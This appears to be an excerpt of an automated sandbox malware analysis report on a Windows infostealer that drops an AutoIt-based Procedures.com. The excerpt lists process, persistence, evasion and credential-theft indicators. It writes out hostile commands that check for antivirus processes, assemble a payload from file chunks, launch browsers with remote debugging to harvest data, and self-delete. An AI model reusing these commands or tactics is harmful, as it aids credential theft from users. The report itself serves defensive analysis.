                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2508 --field-trial-handle=2356,i,7400359050630250975,17873444057706261600,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2592 --field-trial-handle=2492,i,16554835861634890053,15790992392374855556,262144 /prefetch:3
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2052,i,14059903290940015210,10677024805754499588,262144 /prefetch:3
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2724 --field-trial-handle=2372,i,14569064523681728109,8577273085743409208,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2744 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6748 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6900 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\139308\Procedures.com" & rd /s /q "C:\ProgramData\DJMYU3ECBA1N" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: apphelp.dll, version.dll, kernel.appcore.dll, uxtheme.dll, shfolder.dll, windows.storage.dll, wldp.dll, propsys.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, textshaping.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll, apphelp.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll, mpr.dll, framedynos.dll, dbghelp.dll, sspicli.dll, srvcli.dll, netutils.dll, kernel.appcore.dll, wbemcomn.dll, winsta.dll, amsi.dll, userenv.dll, profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, rasadhlp.dll, sspicli.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, dbghelp.dll, iertutil.dll, profapi.dll, ondemandconnroutehelper.dll, winhttp.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncryptsslp.dll, ntmarta.dll, windowscodecs.dll, propsys.dll, windows.fileexplorer.common.dll, apphelp.dll, ntshrui.dll, cscapi.dll, windows.staterepositoryps.dll, linkinfo.dll, edputil.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\trZG6pItZj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Google Drive.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: YouTube.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Sheets.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Gmail.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Slides.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Docs.lnk.15.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: trZG6pItZj.exeStatic file information: File size 1146198 > 1048576
                Source: trZG6pItZj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: trZG6pItZj.exeStatic PE information: real checksum: 0x11dc0c should be: 0x122801
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E40DE6 push ecx; ret 11_2_00E40DF9

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\139308\Procedures.com

                Boot Survival

                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00EB26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_00EB26DD
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E3FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00E3FC7C
                Source: C:\Users\user\Desktop\trZG6pItZj.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Procedures.com, 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comAPI coverage: 3.9 %
                Source: C:\Windows\SysWOW64\timeout.exe TID: 6600Thread sleep count: 88 > 30
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E8DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00E8DC54
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E9A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00E9A087
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E9A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00E9A1E2
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E8E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_00E8E472
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E9A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_00E9A570
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E966DC FindFirstFileW,FindNextFileW,FindClose,11_2_00E966DC
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E5C622 FindFirstFileExW,11_2_00E5C622
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_00E973D4
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E97333 FindFirstFileW,FindClose,11_2_00E97333
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E8D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00E8D921
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E25FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00E25FC8
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\139308
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\139308\
                Source: DJWL6P.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: DJWL6P.11.drBinary or memory string: discord.comVMware20,11696428655f
                Source: DJWL6P.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: DJWL6P.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: DJWL6P.11.drBinary or memory string: global block list test formVMware20,11696428655
                Source: DJWL6P.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Procedures.com, 0000000B.00000002.3152315599.00000000014F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: msedge.exe, 00000013.00000003.2678045932.000074D002590000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                Source: DJWL6P.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: DJWL6P.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: DJWL6P.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: DJWL6P.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: DJWL6P.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Procedures.com, 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: DJWL6P.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: DJWL6P.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: DJWL6P.11.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: DJWL6P.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: msedge.exe, 00000013.00000002.2688599797.0000019CBFC42000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000017.00000002.2850531149.000001CDC6646000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: DJWL6P.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: DJWL6P.11.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: DJWL6P.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: DJWL6P.11.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: DJWL6P.11.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: DJWL6P.11.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: DJWL6P.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: DJWL6P.11.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: DJWL6P.11.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: DJWL6P.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: DJWL6P.11.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: DJWL6P.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Procedures.com, 0000000B.00000002.3152315599.00000000014F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxV4
                Source: DJWL6P.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Procedures.com, 0000000B.00000002.3159668488.0000000006470000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                Source: DJWL6P.11.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: DJWL6P.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: DJWL6P.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com Process information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E9F4FF BlockInput,11_2_00E9F4FF
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E2338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00E2338B
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E45058 mov eax, dword ptr fs:[00000030h]11_2_00E45058
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E820AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,11_2_00E820AA
                Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E52992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00E52992
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E40BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00E40BAF
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E40D45 SetUnhandledExceptionFilter,11_2_00E40D45
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E40F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00E40F91

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: Procedures.com PID: 1576, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E81B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00E81B4D
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E2338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00E2338B
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E8BBED SendInput,keybd_event,11_2_00E8BBED
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E8ECD0 mouse_event,11_2_00E8ECD0
                Source: C:\Users\user\Desktop\trZG6pItZj.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Earning Earning.cmd & Earning.cmd
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 139308
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Frame" Ron
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Brochure + ..\Divine + ..\Surgery + ..\Posting j
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\139308\Procedures.com Procedures.com j
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\139308\Procedures.com" & rd /s /q "C:\ProgramData\DJMYU3ECBA1N" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E814AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,11_2_00E814AE
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E81FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00E81FB0
                Source: Procedures.com, 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp, Night.0.dr, Procedures.com.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Procedures.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E40A08 cpuid 11_2_00E40A08
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E7E5F4 GetLocalTime,11_2_00E7E5F4
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E7E652 GetUserNameW,11_2_00E7E652
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E5BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_00E5BCD2
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

                Stealing of Sensitive Information

                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 11.2.Procedures.com.3fb0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000003.2364490676.0000000003FB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2364595712.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2364186643.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3157816062.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2364080745.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3156069871.0000000003CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Procedures.com PID: 1576, type: MEMORYSTR
